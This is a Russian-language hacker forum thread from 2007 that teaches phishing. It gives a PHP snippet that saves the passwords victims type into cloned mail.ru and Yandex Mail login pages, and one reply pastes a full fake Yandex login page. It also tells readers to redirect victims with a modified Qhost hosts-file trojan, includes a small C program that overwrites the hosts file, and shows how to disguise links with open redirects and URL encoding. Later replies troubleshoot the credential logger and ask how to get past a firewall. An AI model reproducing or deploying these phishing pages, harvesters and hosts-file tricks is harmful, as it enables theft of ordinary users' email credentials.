ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Все о фейках
  #1  
Старый 28.04.2007, 03:17
Аватар для bxN5
bxN5
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330

Репутация: 343


Отправить сообщение для bxN5 с помощью ICQ
По умолчанию Все о фейках

Все о фейках

Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.
Код HTML:
<form action="1.php" method="POST"> 
    <input type="text" name="login"> 
    <input type="password" name="pass"> 
    <select name="dom"><option value="mail.ru">@mail.ru</option> 
    </select> 
    <br > <input type="submit" value="Войти"> 

    </form>
Теперь дописываем так,что бы пароли сохранялись у нас
PHP код:
if(@$_POST['login']){    условие
$fp 
fopen ("file.txt""a"); открытие файла
fwrite 
($fp"$_POST[pass] : $_POST[login] : $_POST[dom] \n");  пишем в файл данные которые ввел юзер на фейковой страничке 
fclose 
($fp); закрываем файл
Про работу с файлами на php можно прочитать тут
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.

В файл hosts добавлены следующие строки:

61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com

Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...
4.Заключение
Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip.
Спасибо за внимание,удачного фишинга=)
Пишем замечания

Последний раз редактировалось bxN5; 28.04.2007 в 03:19..
 
Ответить с цитированием

  #2  
Старый 28.04.2007, 09:30
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

читал не давно на геймерском форуме, ты там запостил. . . Статья так себе, нового нету для меня, но для других может откроет. Интересно было почитать
 
Ответить с цитированием

  #3  
Старый 28.04.2007, 14:46
Аватар для Morph
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

А чо с оутпостом делать будешь, который сразу на*** пошлет твоего троя при попытке изменить хостс?
 
Ответить с цитированием

  #4  
Старый 28.04.2007, 15:03
Аватар для bxN5
bxN5
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330

Репутация: 343


Отправить сообщение для bxN5 с помощью ICQ
По умолчанию

Можно приглушить пробовать,замаскировать самого троя.
 
Ответить с цитированием

  #5  
Старый 29.04.2007, 21:10
Аватар для bxN5
bxN5
Постоянный
Регистрация: 08.01.2006
Сообщений: 865
Провел на форуме:
3279330

Репутация: 343


Отправить сообщение для bxN5 с помощью ICQ
По умолчанию

Код:
#include <conio.h>
#include <stdio.h>
FILE *f;
int x=1000;
void main ()
{
clrscr ();
f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\hosts","w");
fprintf (f,"%i",x);
fclose (f);
}
Вот накатал по шустряку ,у кого норм фаер стоит откомпильте запустите pLz
 
Ответить с цитированием

  #6  
Старый 09.05.2007, 04:55
Аватар для bx_N
bx_N
Познающий
Регистрация: 06.03.2007
Сообщений: 32
Провел на форуме:
72193

Репутация: 46
По умолчанию

Аутпост кричит((Его только асемблером в доверенный процесс втираться или еще как можно?
 
Ответить с цитированием

  #7  
Старый 21.11.2007, 03:58
Аватар для Zircool
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
Отправить сообщение для Zircool с помощью ICQ
По умолчанию

Делаю фэйк для mail.yandex.ru...
Цитата:
<?
header("Content-Type:text/html;charset=windows-1251");
?><html lang="ru"><head><title>Яндекс.Почта</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico">
<link rel="stylesheet" type="text/css" href="files/common.css">
<link rel="stylesheet" type="text/css" href="files/mail-common.css">
<link rel="stylesheet" type="text/css" href="files/mail-login.css">
<style type="text/css"><!--td.dignity p span {font-size:140%;}td.form div.checkbox div.reducer {left: 28%;}* html td.form div.checkbox div.reducer label {display: block; float: left; width: 100%;}* html td.form div.checkbox span.input {left: -2px;}#dignityCell {margin-top: 1em;}.new_mail{font-size: 1.5em;}--></style>
<script type="text/javascript">var fromMail = false;</script><script type="text/javascript" src="http://passport.yandex.ru/passport?mode=testloginjs&amp;id42426765"></script>
<script type="text/javascript" src="files/index_main.js"></script></head>
<body style="background-image:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id42426765)">
<table class="layout root"><tr><td class="layout content"><div align="center"><a href="http://www.yandex.ru/">
<img src="files/yandex.gif" alt="Яndex" width="136" height="83"></a></div>
<table class="layout main" width="100%">
<tr class="layout" valign="top">
<td class="features layout">
<div id="featuresCell">
<h2>Почта Яндекса — это:</h2>
<p class="plus big">
<span><a href="http://mail.yandex.ru/unlimited">Бесконечный ящик</a></span>
<br>Вы можете не думать о том, сколько места занимают ваши письма.</p>
<p class="plus no-spam"><span><a href="http://help.yandex.ru/mail/?id=288423">Отсутствие спама</a></span>
<br><a href="http://so.yandex.ru/">
<img src="files/logo_so.gif" alt="Спамооборона" title="Спамооборона" style="margin: 3px 15px 0 10px;" align="right">
</a>Ваш почтовый ящик надежно защищен программой «<a href="http://so.yandex.ru/">Спамооборона</a>».<br></p>
<p class="plus revolutional">
<span><a href="http://mail.yandex.ru/pda_info">Мобильная версия</a></span>
<br>Для смартфонов, коммуникаторов и КПК.</p>
<p class="plus red">
<span><a href="http://help.yandex.ru/mail/?id=288215" target="_blank">Защита от вирусов</a></span>
<br><a target="_blank" href="http://www.drweb.com/">
<img src="files/drweb2.gif" alt="Dr.Web" title="Dr.Web" align="right" style="margin: 3px 0 0 10px;">
</a>Все письма проверяются антивирусной программой «<a href="http://www.drweb.com" target="_blank">Dr.Web</a>».</p></div></td>
<td id="loginForm" class="form layout">
<div class="tl">
<div class="tr">
<div class="bl">
<div class="br">
<form action="1.php" method="post" name="MainLogin" id="loginform">
<img src="files/heading.gif" alt="Почта" width="136" height="36" style="margin: 15px 0 10px 0;">
<div class="input login">
<label for="inputLogin">логин:</label>
<br><input type="text" name="login" id="inputLogin" tabindex="1"></div>
<div class="input passwd">
<label for="inputPassword">пароль:</label>
<br><input type="password" name="passwd" id="inputPassword" tabindex="2"></div>
<p style="text-align: center;">
<label for="twoweeks">
<input type="checkbox" id="twoweeks" name="twoweeks" value="yes" autocomplete="no" tabindex="3" style="vertical-align: middle;"> запомнить меня</label></p>
<div><input type="hidden" name="retpath" value="http://mail.yandex.ru/?from=mail&amp;r=id35388573">
<input type="submit" value="Войти" class="hugeBtn" tabindex="4"></div>
<p class="forgotten-link"><a href="http://passport.yandex.ru/passport?mode=remember" tabindex="5">
<span>Вспомнить пароль</span></a>
<br><br><a href="http://passport.yandex.ru/passport?mode=register&amp;msg=mail&amp;retpath=ht tp://mail.yandex.ru/?from=mail&amp;r=id35388573" class="new_mail">
<span>Заведите почту на Яндексе</span></a></p></form>
<script type="text/javascript" src="files/forcehttps.js"></script></div></div></div></div></td>
<td class="dignity layout">
<div id="dignityCell">
<h2>Почтовая фишка № 14</h2>
<p><img src="files/marka14.gif" width="162" height="101" alt="Адресная книга"></p>
<p>Умная адресная книга подсказывает адреса при создании письма, причем она знает, что фамилия «Шендерович» может писаться латиницей как Shenderovitch, Schenderovich и дюжиной других вариантов.</p></div></td></tr></table></td></tr>
<tr><td class="layout bottom">
<div id="tuning" class="tuning sys-font hidden">
<p><span id="tips_hide" class="pseudo-link hidden">Убрать информацию слева и справа</span>
<span id="tips_show" class="pseudo-link hidden">Показать информацию</span></p></div>
<div class="footer">
<hr><p class="copy">Чистая почта © 2001—2007 «<a href="http://www.yandex.ru/">Яндекс</a>»
<br><a href="http://feedback.yandex.ru/?from=webmail">Обратная связь</a> ·
<a href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</a> ·
<a href="http://advertising.yandex.ru/mail.xml">Реклама</a></p>
<div class="pda_link">
<a href="/pda">Мобильная версия</a></div>
<div id="made-in" class="made">
<a href="http://www.artlebedev.ru/">
<img src="files/logo-artlebedev.gif" width="90" height="37" alt="art. lebedev"></a> Дизайн —<br> <a href="http://www.artlebedev.ru/">Студия Артемия Лебедева</a></div>
<br clear="all"></div></td></tr></table>
<script type="text/javascript">init(false);</script></body></html>

Создал файл 1.php прописал туда
Цитата:
<?php
if(@$_POST['login']){ условие
$fp = fopen ("file.txt", "a"); открытие файла
fwrite ($fp, "$_POST[passwd] : $_POST[login] \n"); пишем в файл данные которые ввел юзер на фейковой страничке
fclose ($fp); закрываем файл.
?>
И создал файл file.txt прохожу авторизацию на фэйк чтранице но пароли в file.txt Не сохраняются... В чём может быть ошибка?
 
Ответить с цитированием

  #8  
Старый 21.11.2007, 04:08
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Проверь правильность написание логин и пасс в 1.php регистр тоже важен.
+ Вроде рядом с полями логина и пароля надо жиддены удалять :\
+ файл фейка, 1.php и file.txt должны иметь значния 777 - ВАЖНО! (скорее всего из-за этого)
 
Ответить с цитированием

  #9  
Старый 25.11.2007, 19:05
Аватар для Хелпер
Хелпер
Участник форума
Регистрация: 21.02.2007
Сообщений: 171
Провел на форуме:
849260

Репутация: 32
По умолчанию

Всё делаю как написано, но по нажатию кнопки войти меня перекидывает на страницу http://xxxx.jino-net.ru/1.php
Что делать?
 
Ответить с цитированием

  #10  
Старый 26.11.2007, 00:25
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

настраивать 1.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03
Что делать если поймали. _-[A.M.D]HiM@S-_ Чужие Статьи 116 06.08.2007 10:14
Вы все еще с проституткой? Тогда мы идем к вам! BlackCats Мировые новости 3 15.01.2007 16:19
Евросеть vs МВД – бои местного значения novichok Новости мира "железа" 0 09.04.2006 11:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ